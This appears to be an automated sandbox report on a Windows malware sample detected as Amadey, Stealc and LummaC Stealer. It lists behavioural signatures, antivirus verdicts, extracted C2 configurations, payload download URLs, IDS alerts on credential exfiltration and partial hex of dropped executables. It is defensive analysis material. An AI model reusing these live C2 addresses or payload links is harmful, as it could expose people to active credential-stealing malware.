Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572092
MD5: 326ad6c04a850bb9ba3ce77d62df16e9
SHA1: 0368902cb7250e0aef40b8d67606234d5934f5fd
SHA256: a4e844ff190e6bb8c0afab32f76630758d7b196ae40062765ab8ff457bf1b9b3
Tags: exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: https://atten-supporse.biz/apite Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exek Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpA. Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/unique2/random.exeEi Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/unique2/random.exeed Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apipy Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000006.00000002.3255134958.00000000001F1000.00000040.00000001.01000000.00000008.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 79ddad050f.exe.5228.8.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "se-blurry.biz", "dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "impend-differ.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz"], "Build id": "LOGS11--LiveTraffic"}
Source: e051bdf457.exe.3716.9.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Source: https://atten-supporse.biz/apite Virustotal: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 63%
Source: file.exe Virustotal: Detection: 58%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 7_2_004035B0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B73817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 7_2_04B73817
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 734386a52c.exe, 0000001E.00000002.3260064307.0000000000AB2000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000003.3184731936.00000000048A0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004176E7 FindFirstFileExW, 7_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007EA9 FindFirstFileExW, 7_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B8794E FindFirstFileExW, 7_2_04B8794E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 192MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49828
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49849 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:54969 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49868 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49887 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49894 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49893 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49906 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49895
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49895
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49914 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49937 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49948 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49972 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49993 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49966 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50042 -> 104.21.64.1:443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:10 GMTContent-Type: application/octet-streamContent-Length: 1990144Last-Modified: Tue, 10 Dec 2024 03:19:19 GMTConnection: keep-aliveETag: "6757b337-1e5e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:18 GMTContent-Type: application/octet-streamContent-Length: 1832448Last-Modified: Tue, 10 Dec 2024 03:29:09 GMTConnection: keep-aliveETag: "6757b585-1bf600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:27 GMTContent-Type: application/octet-streamContent-Length: 1801728Last-Modified: Tue, 10 Dec 2024 03:29:17 GMTConnection: keep-aliveETag: "6757b58d-1b7e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:36 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Tue, 10 Dec 2024 03:27:27 GMTConnection: keep-aliveETag: "6757b51f-ec600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 04:10:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:43 GMTContent-Type: application/octet-streamContent-Length: 2800128Last-Modified: Tue, 10 Dec 2024 03:27:52 GMTConnection: keep-aliveETag: "6757b538-2aba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 9b 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 